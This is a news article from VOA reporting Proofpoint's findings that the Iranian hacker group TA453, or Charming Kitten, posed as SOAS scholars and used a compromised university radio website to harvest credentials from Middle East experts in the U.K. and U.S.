By Masood Farivar, VOA
WASHINGTON – A notorious group of hackers tied to Iran’s Islamic Revolutionary Guard Corps has waged a covert campaign targeting university professors and other experts based in the U.K. and the U.S. in an attempt to steal their sensitive information, according to research by the cybersecurity firm Proofpoint.
The group, known as TA453 and Charming Kitten, has been masquerading as British scholars at the University of London’s School of Oriental and African Studies (SOAS) since at least January in approaching their victims, Proofpoint said in a new report released Tuesday.
The Proofpoint researchers said they could not independently confirm that the hacker group is part of the IRGC, but they assess with “high confidence” that it supports IRGC’s intelligence collection efforts. The IRGC was founded after the Iranian Revolution as a parallel force to the Iranian military. The hackers have previously targeted American and Israeli medical researchers, the Munich Security Conference and a U.S. presidential campaign, according Proofpoint.
The targets of the latest hacking campaign included think tank experts on Middle Eastern affairs, top professors at well-known academic institutions and journalists specializing in the Middle East — all individuals with information about foreign policy, insights into Iranian dissident movements and an understanding of U.S. nuclear talks, the Proofpoint researchers said. Most of the victims had been previously hit by the same hacker group, they said.
“TA453’s continued interest in these targets demonstrates a persistent Iranian commitment to use cyber operations to collect information in support of IRGC intelligence priorities,” Sherrod DeGrippo, senior director for threat research and detection at Proofpoint, wrote in an email to VOA. “TA453’s targeting may demonstrate a desire to understand the informal policy discussions and positions that may occur outside of government but still influence decision makers.”
The company did not disclose the names of the targets but said it has worked with authorities to notify the victims.
In a hacking campaign of this kind, known as credential harvesting, cybercriminals first connect with victims via email before sending them a malicious attachment or a link to a compromised website designed to steal passwords.
As part of the latest operation, dubbed SpoofedScholars, the IRGC-tied hacker group compromised the website of SOAS Radio and then sent the targets a conference “registration link” to the site, according to the researchers. The compromised website was tweaked to capture a variety of credentials, the report said.
In one case, a hacker posing as a “senior teaching and research fellow” with SOAS sent “an initial email trying to entice the target with a prospective invitation to an online conference on “The U.S. Security Challenges in the Middle East.” After an exchange that confirmed the victim’s interest in the conference, the hacker sent the target a “detailed invitation” to the fake event, researchers said.
While it remains unclear whether the hackers managed to steal the targets’ credentials, DeGrippo said that historically the group has used stolen passwords to “exfiltrate inbox contents” and use the compromised accounts to conduct further phishing attacks.
Proofpoint, which monitors a variety of Iranian hacker groups, says it has tracked TA453 since 2017. Proofpoint researchers say Operation SpoofedScholars is one of the more sophisticated TA453 campaigns they’ve identified.
The U.S. intelligence community said it is “most concerned” about the cyber capabilities of Russia, Iran, China and North Korea. In its latest assessment in April, the intelligence community said, “Iran’s expertise and willingness to conduct aggressive cyber operations make it a significant threat to the security of U.S. and allied networks and data.”
“Iran has the ability to conduct attacks on critical infrastructure, as well as to conduct influence and espionage activities,” the assessment said.
During the 2020 presidential campaign, Iranian hackers sent threatening emails to Democratic voters in October, and in December released information about U.S. election officials to undermine confidence in the election, according to the Proofpoint report.